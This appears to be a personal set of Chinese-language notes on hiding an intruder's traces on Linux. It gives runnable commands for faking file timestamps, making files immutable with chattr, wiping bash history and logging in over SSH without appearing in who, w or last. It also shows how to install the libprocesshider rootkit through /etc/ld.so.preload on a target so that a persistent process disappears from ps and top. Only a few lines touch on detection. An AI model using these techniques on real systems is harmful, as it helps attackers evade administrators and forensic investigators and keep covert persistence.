隐藏文件/夹&-开头文件

如何创建:

在文件名之前加.即可 touch .1.s

如何清除、查找：

ls -al

rm -fr

-文件

已-开头的文件直接读取是不行的需要带目录

隐藏时间戳

①用其他文件的时间

touch -r zww.php testq.txt

如何清除、查看：

stat testq.txt

②修改时间戳

touch -t 时间戳 文件名

隐藏权限

通过chattr锁定文件 chattr +i testq.txt 管理员无法直接删除

清除：

chattr -i testq.txt

rm -fr testq.txt

隐藏删除历史记录

删除指定日志：

history -d num echo "">.bash_history#重定向为空

ssh隐身登录

不记录登录信息，无法被who、w、last命令检测

如何检测: 仅能通过日志查询

yum install git

git clone https://github.com/gianlucaborello/libprocesshider.git c

d libptocesshider

修改1.sh位置为任意想要隐藏的名称

make编译 若无法在目标系统编译可选择在本地编译好之后上传

得到文件libprocesshider.so

同步该文件至

cp libprocesshider.so /usr/local/lib/

加载至全局动态链接 echo /usr/local/lib/libprocesshider.so>>/etc/ld.so.preload 运行1.sh内容无所谓重要是持久，建议直接写一个sleep 1000

之后去查看ps和top，进程会被隐藏